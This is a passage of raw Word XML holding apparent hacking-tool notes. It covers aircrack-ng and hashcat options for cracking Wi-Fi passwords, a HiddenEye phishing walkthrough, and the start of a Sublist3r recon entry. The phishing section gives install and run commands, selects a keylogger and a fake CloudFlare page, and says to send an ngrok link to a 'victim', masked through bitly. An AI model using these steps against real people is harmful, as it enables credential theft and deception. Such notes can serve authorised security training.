    <w:p w14:paraId="79C646C8" w14:textId="2096C68F" w:rsidR="00EF7FF8" w:rsidRPr="0084205E" w:rsidRDefault="00EF7FF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534C1F29" w14:textId="02CA49E3" w:rsidR="00EF7FF8" w:rsidRPr="0084205E" w:rsidRDefault="00EF7FF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-ng – Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED47F7" w14:textId="40B5FF51" w:rsidR="00EF7FF8" w:rsidRPr="0084205E" w:rsidRDefault="00EF7FF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To crack password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2110A3DD" w14:textId="2BA648D4" w:rsidR="00EF7FF8" w:rsidRPr="0084205E" w:rsidRDefault="00EF7FF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> or create </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2544BD7E" w14:textId="0813E6B7" w:rsidR="00EF7FF8" w:rsidRPr="0084205E" w:rsidRDefault="00EF7FF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>to specify a BSSID attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E86AFE7" w14:textId="39652EA8" w:rsidR="00EF7FF8" w:rsidRPr="0084205E" w:rsidRDefault="00EF7FF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BBC64F" w14:textId="04870F79" w:rsidR="00EF7FF8" w:rsidRPr="0084205E" w:rsidRDefault="00EF7FF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To specify wordlist use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C69540C" w14:textId="7B83ED32" w:rsidR="00EF7FF8" w:rsidRPr="0084205E" w:rsidRDefault="00EF7FF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2F8084" w14:textId="7D3F54F2" w:rsidR="00EF7FF8" w:rsidRPr="0084205E" w:rsidRDefault="00EF7FF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">To create a HCCAPX </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to crack the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5798643C" w14:textId="7A9918DE" w:rsidR="00EF7FF8" w:rsidRPr="0084205E" w:rsidRDefault="00EF7FF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5BEDCA" w14:textId="767ACB5C" w:rsidR="00EF7FF8" w:rsidRPr="0084205E" w:rsidRDefault="00EF7FF8" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F695F7" w14:textId="273A3E45" w:rsidR="00EF7FF8" w:rsidRPr="0084205E" w:rsidRDefault="001305A7" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>HiddenEye</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – Phishing Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E29E0A" w14:textId="77777777" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>CLONE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6920302D" w14:textId="77213198" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>git clone https://gitlab.com/an0nud4y/HiddenEye.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E52689" w14:textId="77777777" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RUNNING (In Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0416BB" w14:textId="77777777" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 777 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>HiddenEye</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43E8F048" w14:textId="77777777" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>sudo apt install python3-pip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A56C6CE" w14:textId="77777777" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>HiddenEye</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E15C612" w14:textId="77777777" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>sudo pip3 install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345C7655" w14:textId="77777777" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>sudo pip3 install requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294EE9F1" w14:textId="581303F5" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>python3 HiddenEye.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53717C8B" w14:textId="77777777" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00739ABD" w14:textId="5EA5F9E7" w:rsidR="001305A7" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">HiddenEye.py    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2070EFFB" w14:textId="62347714" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>LOCALTUNNEL = N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C929FD" w14:textId="6D5C7BB7" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4590312F" w14:textId="10030D26" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Choose Site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601C3369" w14:textId="1A3A1A1A" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42081F3A" w14:textId="02A65B78" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Fake </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>CloudFlare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430FC5A3" w14:textId="461E7204" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Receive Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1908D880" w14:textId="61803249" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>URL Redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1600F3" w14:textId="3391D948" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Custom Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D497EFC" w14:textId="721BC5FF" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E87C43E" w14:textId="2C65A027" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Server Selection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BDB3BC" w14:textId="5B953C3E" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ngrok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0734F802" w14:textId="3CB212CF" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Copy and Send NGROK URL to victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168867EB" w14:textId="26B49879" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Masking Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794A252F" w14:textId="2D9A3176" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Copy NGROK Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6837BD" w14:textId="2C2A8CBC" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Navigate to </w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://bitly.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F1CD320" w14:textId="0794019C" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>short URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540E6588" w14:textId="69EE6E60" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Copy new link and send to victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0D3B2D" w14:textId="2EE46E6B" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="00CB51BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="480B0DD5" w14:textId="1C661FB4" w:rsidR="00CB51BA" w:rsidRPr="0084205E" w:rsidRDefault="001A7FEC" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sublist3r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DAEC0C" w14:textId="634E38EE" w:rsidR="001A7FEC" w:rsidRPr="0084205E" w:rsidRDefault="006109FD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEAF4CD" w14:textId="303BCBCF" w:rsidR="006109FD" w:rsidRPr="0084205E" w:rsidRDefault="006109FD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>python script that allows quick and easy recon against a target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0106A037" w14:textId="258E557F" w:rsidR="006109FD" w:rsidRPr="0084205E" w:rsidRDefault="006109FD" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>discover various subdomains associated with the websites/domains in scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60729E09" w14:textId="3DC22F9E" w:rsidR="006109FD" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
